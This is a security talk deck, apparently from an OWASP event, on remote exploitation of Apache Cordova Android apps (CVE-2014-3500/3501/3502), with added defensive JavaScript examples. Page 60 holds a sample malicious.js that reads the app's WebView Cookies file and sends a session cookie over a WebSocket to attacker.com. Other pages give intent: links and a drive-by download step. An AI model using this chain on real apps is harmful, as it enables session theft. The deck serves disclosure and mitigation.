THE BANK JOB: MOBILE EDITION - OWASP
Page 1
THE BANK JOB: MOBILE EDITION: Remote Exploitation of the Cordova Framework
Roee Hay & David Kaplan, IBM Security Systems X-Force Application Security Research Team
Page 2
APACHE CORDOVA
Pages 3-4
Apache Cordova
(Diagram: a separate Native App for each of Android, iOS and Windows Phone)
Pages 5-6
Apache Cordova
(Diagram: an HTML5 App on each of Android, iOS and Windows Phone)
Page 7
Apache Cordova
5.81% of all Android apps
AppBrain Stats
Page 8
ANDROID APP SECURITY
Page 9
Feature Restriction
• Sensitive features are restricted by default.
• Usually can be enabled by acquiring permissions.
SmsManager sms = SmsManager.getDefault();
sms.sendTextMessage(phoneNumber, null, message, null, null);
Requires android.permission.SEND_SMS
Page 10
Abuse of Feature Restriction
• Goal. Abuse system services for the malware's own profit:
  • Premium SMS numbers
  • GPS access
  • System log access
• Prerequisites. None.
• Attack Vector. Malware
• Detectability. Suspicious use of permissions
Page 11
Android Application Sandbox
• Isolates app data from being accessed by malware
• Mainly implemented by giving each app package its own Linux user.
(Diagram: App A, App B, App C, App D, App E, App F, each in its own sandbox)
Page 12
Abuse of the Sandbox
• Goal. Subvert the integrity and confidentiality of other apps
• Prerequisites. Target apps must be vulnerable
• Attack vectors. Malware; drive-by exploitation (naïve browse)
• Detectability. Harder: no permissions are used
Page 13
ATTACK OUTLINE
Pages 14-19
Remote Drive-By Attack (Simplified)
(Diagram: Victim's Device running a Cordova App)
Naïve Browse → Malicious Data → Malicious Invocation → Sensitive data leak
Page 20
DEMO
Page 21
STEP I: MALICIOUS INVOCATION
Cordova App
Malicious Invocation
Pages 22-24
Activities & IPC
(Diagram: App with activities A, B, C and D)
• Activities – Building block of Android apps
• Inter-process communication using Intents
• Exported activities can be invoked by other apps
Page 25
Explicit vs Implicit Intents
(Diagram: App with activities A, B, C and D)
• Explicit Intents – Target activities by their fully qualified identifier (e.g. App.B)
• Example:
Intent i = new Intent();
i.setClassName("App", "B");
i.setData(Uri.parse("some payload"));
i.putExtra("foo", "bar");
startActivity(i);
Pages 26-28
Explicit vs Implicit Intents
• Implicit Intents – Target is not specified. Resolution by Intent filters, e.g. URI scheme.
• Example #1:
Intent i = new Intent();
i.setData(Uri.parse("play://hello"));
i.putExtra("foo", "bar");
startActivity(i);
• Example #2:
Intent i = new Intent();
i.setData(Uri.parse("https://www.ibm.com"));
i.putExtra("foo", "bar");
startActivity(i);
Pages 29-35
Remote Invocation via Browsers
(Diagram: Naïve Browse → HTML page containing an intent: link → Intent delivered to activity A or B of App; the Intent can be implicit or explicit)
Explicit Invocation: intent:#Intent;component=App/.B;S.param=data;end
Implicit Invocation: intent:#Intent;scheme=app://;S.param=data;end
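An added example (not from the talk or from Cordova): a small parser for the `intent:` link syntax shown above, which a defender auditing a page's links can use to see which activity a link targets, whether explicitly (component) or implicitly (scheme/action), and which extras it carries. The HTML snippet is constructed; the two intent links in it are the ones on the slide.

```javascript
'use strict';

// Added example, not code from the talk or from Cordova. Parses an Android "intent:" URL of
// the form  intent:<data>#Intent;<field>=<value>;...;end  as shown on the slide, e.g.
//   intent:#Intent;component=App/.B;S.param=data;end   (explicit: names the activity)
//   intent:#Intent;scheme=app://;S.param=data;end      (implicit: resolved by intent filter)
// Extras are written as <type>.<name>=<value>; "S." is a String extra.
function parseIntentUrl(url) {
  if (typeof url !== 'string' || !url.startsWith('intent:')) {
    throw new Error('not an intent: URL');
  }
  const marker = url.indexOf('#Intent;');
  if (marker === -1 || !url.endsWith(';end')) {
    throw new Error('malformed intent: URL (needs "#Intent;" and a trailing ";end")');
  }
  const result = {
    kind: 'implicit',                 // becomes 'explicit' once a component= field is seen
    data: decodeURIComponent(url.slice('intent:'.length, marker)), // data URI, may be empty
    component: null,
    scheme: null,
    action: null,
    package: null,
    extras: {},                       // extra name -> { type, value }
  };
  const body = url.slice(marker + '#Intent;'.length, url.length - ';end'.length);
  for (const field of body.split(';')) {
    if (field === '') continue;
    const eq = field.indexOf('=');
    if (eq === -1) throw new Error('malformed field: ' + field);
    const key = field.slice(0, eq);
    const value = decodeURIComponent(field.slice(eq + 1));
    if (key === 'component') {
      result.component = value;
      result.kind = 'explicit';
    } else if (key === 'scheme' || key === 'action' || key === 'package') {
      result[key] = value;
    } else if (/^[A-Za-z]\.[^=]+$/.test(key)) {
      result.extras[key.slice(2)] = { type: key[0], value };
    } else {
      throw new Error('unsupported field: ' + key);
    }
  }
  return result;
}

// Pulls every href out of an HTML string and returns the parsed intent: links, keeping
// malformed ones (with the parser's error) so an audit does not silently skip them.
function findIntentLinks(html) {
  const found = [];
  for (const m of html.matchAll(/href\s*=\s*["']([^"']+)["']/gi)) {
    const href = m[1];
    if (!href.startsWith('intent:')) continue;
    try {
      found.push({ href, ...parseIntentUrl(href) });
    } catch (err) {
      found.push({ href, error: err.message });
    }
  }
  return found;
}

// Constructed sample page: one ordinary link plus the two intent: links from the slide.
const SAMPLE_HTML = `
<a href="https://www.ibm.com/">ordinary link</a>
<a href="intent:#Intent;component=App/.B;S.param=data;end">explicit invocation</a>
<a href="intent:#Intent;scheme=app://;S.param=data;end">implicit invocation</a>
`;

for (const link of findIntentLinks(SAMPLE_HTML)) {
  console.log(link.kind, link.component || link.scheme, JSON.stringify(link.extras));
}
```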
Page 36
STEP I DEMO
Page 37
STEP II: CROSS-APPLICATION SCRIPTING
Page 38
The Embedded Browser
Controlled by: WebView.loadUrl(String url)
In this case: WebView.loadUrl("https://www.nytimes.com")
Page 39
Cross-Application Scripting (XAS)
But what if…
Intent i = getIntent();
WebView.loadUrl(i.getDataString());
…on an exported activity?
Pages 40-41
The Cordova XAS Vulnerability (CVE-2014-3500)
Vulnerable App
CordovaWebView.java
@Override
public void loadUrl(String url) {
    if (url.equals("about:blank") || url.startsWith("javascript:")) {
        this.loadUrlNow(url);
    } else {
        String initUrl = this.getProperty("url", null);
        // If first page of app, then set URL to load to be the one passed in
        if (initUrl == null) {
            this.loadUrlIntoView(url);
        }
        // Otherwise use the URL specified in the activity's extras bundle
        else {
            this.loadUrlIntoView(initUrl);
        }
    }
}
Callouts on the slide: getProperty("url", null) reads the Intent extra "url", which flows unchecked through this.loadUrlIntoView(initUrl) into WebView.loadUrl(url).
Pages 42-44
Theft of Sensitive Files by Malware
(Diagram: the malware sends an Intent with file://.../malware/.../malicious.js to the vulnerable app, which loads it in its WebView)
malicious.js:
1. Reads sensitive files using IFRAME/AJAX. For example: /app_webview/Cookies
2. Leaks them to the attacker (explained below)
Page 45
Theft of Sensitive Files
Problem:
Cordova to the Rescue!
@TargetApi(16)
private static class Level16Apis {
    static void enableUniversalAccess(WebSettings settings) {
        settings.setAllowUniversalAccessFromFileURLs(true);
    }
}
Pages 46-50
Theft of Sensitive Files: Remote Attack Upgrade
Naïve Browse → Automatic File Download of malicious.htm
malicious.htm is served with:
Content-Type: application/octet-stream
<HTML> <SCRIPT>payload</SCRIPT> </HTML>
Then an Intent with: file:///sdcard/malicious.htm
Page 51
Theft of Sensitive Files: Remote Attack Upgrade
Problem:
In practice:
• ~80% of devices are still below KITKAT
• 61% of the exploitable apps in our sample set acquired at least one of the external storage permissions.
Page 52
STEP II DEMO
Page 53
STEP III: DATA EXFILTRATION
Sensitive data leak
Page 54
Option I: Data Exfiltration to Remote Attacker
Sensitive data leak
Page 55
Option II: Data Exfiltration to Malware
Sensitive data leak
Page 56
Cordova Whitelists
Leak
Problem: the developer defined the allowed end-points for network requests, e.g.:
https://webservice.mybank.com/
https://*.mybank.com/
So it shouldn't be possible to exfiltrate data!
Pages 57-59
Cordova Whitelist Bypass (CVE-2014-3501)
IceCreamCordovaWebViewClient.java
@Override
public WebResourceResponse shouldInterceptRequest(WebView view, String url) {
    try {
        // Check against the white-list.
        if ((url.startsWith("http:") || url.startsWith("https:")) && !Config.isUrlWhiteListed(url)) {
            LOG.w(TAG, "URL blocked by whitelist: " + url);
            // Results in a 404.
            return new WebResourceResponse("text/plain", "UTF-8", null);
        }
        ...
    }
}
Issue 1: the check applies to http/https URLs only:
if ((url.startsWith("http:") || url.startsWith("https:")) && !Config.isUrlWhiteListed(url)) { <BLOCK REQUEST> }
Only checks HTTP/HTTPS against the whitelist!
Issue 2: shouldInterceptRequest does not catch WebSockets, now supported in the Chrome-based WebView.
Page 60
Theft of Sensitive Files (using CVE-2014-3501)
malicious.js
var req = new XMLHttpRequest();
req.open('GET', 'file://data/data/A/app_webview/Cookies', false);
req.onreadystatechange = function() {
    if (req.readyState == 4) {
        var cookies = req.responseText;
        var offset = cookies.search('sessionCookie');
        var session_cookie = cookies.substring(offset, offset + 81);
        var ws = new WebSocket('ws://attacker.com/ws');
        ws.onopen = function() { ws.send(session_cookie); };
    }
};
req.send();
Pages 61-62
Leak to other Apps via URL Loading (CVE-2014-3502)
CordovaWebViewClient.java
@Override
public boolean shouldOverrideUrlLoading(WebView view, String url) {
    ...
    else {
        if (url.startsWith("file://") || url.startsWith("data:") || Config.isUrlWhiteListed(url)) {
            return false;
        }
        // If not our application, let default viewer handle
        else {
            try {
                Intent intent = new Intent(Intent.ACTION_VIEW);
                intent.setData(Uri.parse(url));
                this.cordova.getActivity().startActivity(intent);
            } catch (android.content.ActivityNotFoundException e) {
                ...
            }
        }
    }
    return true;
}
So if the URL is NOT in the whitelist, the default viewer is executed with it!
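An added example, not Cordova's own code: a simplified JavaScript model of the two hooks discussed on pages 57 to 62, with the original decision logic beside a default-deny variant, so the gaps (non-http schemes never checked, WebSockets never seen by the hook, non-whitelisted URLs handed to other apps) show up as outcomes on constructed URLs. The whitelist matching is a simplified reading of Cordova's `*.` wildcard entries, and the `attacker.example` and `otherapp://` URLs are constructed.

```javascript
'use strict';

// Constructed whitelist in the style of the slide (https://webservice.mybank.com/, https://*.mybank.com/).
const SAMPLE_WHITELIST = ['https://webservice.mybank.com/', 'https://*.mybank.com/'];

function escapeRe(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Compile one Cordova-style entry "<scheme>://<host>[/path]" into a RegExp. In this
// simplified model "*." matches the bare domain and any subdomain, "*" matches any host,
// and a path of "/" (or none) admits every path on that origin. The scheme must match exactly.
function compileEntry(pattern) {
  const m = /^([a-z][a-z0-9+.-]*):\/\/([^/]+)(\/.*)?$/i.exec(pattern);
  if (!m) throw new Error('unsupported whitelist pattern: ' + pattern);
  const [, scheme, host, path] = m;
  let hostRe = escapeRe(host);
  if (host === '*') hostRe = '[^/?#]+';
  else if (host.startsWith('*.')) hostRe = '(?:[a-z0-9-]+\\.)*' + escapeRe(host.slice(2));
  const pathRe = !path || path === '/' ? '(?:[/?#].*)?' : escapeRe(path) + '.*';
  return new RegExp('^' + escapeRe(scheme) + '://' + hostRe + pathRe + '$', 'i');
}

function compileWhitelist(patterns) {
  return patterns.map(compileEntry);
}

function isUrlWhiteListed(url, compiled) {
  return compiled.some((re) => re.test(url));
}

// Scheme as the WebView hooks see it: everything before the first ':'.
function schemeOf(url) {
  const i = url.indexOf(':');
  return i < 0 ? '' : url.slice(0, i).toLowerCase();
}

// Sub-resource requests (XHR, <script>, <img>, ...), original logic from the slide: only
// http(s) is compared against the whitelist, and WebSocket connections never reach
// shouldInterceptRequest at all (CVE-2014-3501).
function originalInterceptRequest(url, compiled) {
  const scheme = schemeOf(url);
  if (scheme === 'ws' || scheme === 'wss') return 'not-intercepted';
  if ((scheme === 'http' || scheme === 'https') && !isUrlWhiteListed(url, compiled)) return 'block';
  return 'pass'; // every other scheme is never checked
}

// Top-level navigation, original logic from the slide: anything not file:, data: or
// whitelisted is handed to the default viewer with an ACTION_VIEW intent, so the full URL
// reaches whichever app claims the scheme (CVE-2014-3502).
function originalOverrideUrlLoading(url, compiled) {
  if (url.startsWith('file://') || url.startsWith('data:') || isUrlWhiteListed(url, compiled)) return 'load';
  return 'external-viewer';
}

// Hardened variants (this example's own default-deny policy, not a Cordova release). Packaged
// assets under file:///android_asset/ and whitelisted origins of any scheme are allowed;
// data: and everything else is treated as non-whitelisted; hand-off to other apps happens only
// for schemes the developer lists. ws/wss remain invisible to the hook, so the same origins
// must also be expressed as a CSP connect-src in the app's HTML.
function hardenedInterceptRequest(url, compiled) {
  const scheme = schemeOf(url);
  if (scheme === 'ws' || scheme === 'wss') return 'not-intercepted';
  if (scheme === 'file') return url.startsWith('file:///android_asset/') ? 'pass' : 'block';
  return isUrlWhiteListed(url, compiled) ? 'pass' : 'block';
}

function hardenedOverrideUrlLoading(url, compiled, handoffSchemes = []) {
  const scheme = schemeOf(url);
  if (scheme === 'file') return url.startsWith('file:///android_asset/') ? 'load' : 'block';
  if (isUrlWhiteListed(url, compiled)) return 'load';
  return handoffSchemes.includes(scheme) ? 'external-viewer' : 'block';
}

// Side-by-side outcomes for a list of URLs.
function compareDecisions(urls, patterns, handoffSchemes = []) {
  const compiled = compileWhitelist(patterns);
  return urls.map((url) => ({
    url,
    originalRequest: originalInterceptRequest(url, compiled),
    hardenedRequest: hardenedInterceptRequest(url, compiled),
    originalNavigation: originalOverrideUrlLoading(url, compiled),
    hardenedNavigation: hardenedOverrideUrlLoading(url, compiled, handoffSchemes),
  }));
}

// Constructed URLs (reserved example domains) covering the cases on the slides.
const SAMPLE_URLS = [
  'https://api.mybank.com/balance',         // legitimate back end
  'https://attacker.example/collect',       // non-whitelisted http(s)
  'ws://attacker.example/ws',               // WebSocket: bypasses the hook
  'ftp://attacker.example/x',               // non-http scheme: never checked originally
  'otherapp://inbox?payload=constructed',   // handed to another app via ACTION_VIEW
  'file:///sdcard/malicious.htm',           // external storage, not a packaged asset
  'file:///android_asset/www/index.html',   // the app's own content
];

console.table(compareDecisions(SAMPLE_URLS, SAMPLE_WHITELIST));
```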
Page 63
STEP III DEMO
Page 64
MITIGATION
Page 65
Cordova Cross-Application Scripting (CVE-2014-3500)
Developers, upgrade to Cordova 3.5.1!!
Pages 66-67
Avoiding Cross-Application Scripting
Avoid the vulnerability:
Never allow user input to control the embedded browser's URL via WebView.loadUrl
Make exploitation harder:
1. Don't enable JavaScript (unless needed)
2. Don't enable universal (or file) access from file URLs (unless needed)
Pages 68-69
Cordova Data Exfiltration Issues (CVE-2014-3501/2)
CVE-2014-3501: Can be mitigated by using Content Security Policy (CSP) meta tags (WebSockets in WebViews honor CSP)
CVE-2014-3502: Plugin released for complete mitigation. 3.6.0 will have a full fix via an expanded whitelist
Page 70
STATS
Pages 71-72
Stats
• Sample set of 137 Cordova apps
• 95 apps are exploitable
• Several banking apps are vulnerable
• Only a single app has updated to the latest Cordova!
Page 73
DISCUSSION & SUMMARY
Page 74
Discussion & Summary
• We found severe vulnerabilities in one of the most popular Android frameworks
• Responsibly disclosed the issues
• Fixes/mitigation are available
• Android defense mechanisms broke Cordova so they were disabled
• App developers are slow in updating
Page 75
Intent i = new Intent(); i.setData("Questions?");
Follow us on Twitter: @roeehay @DepletionMode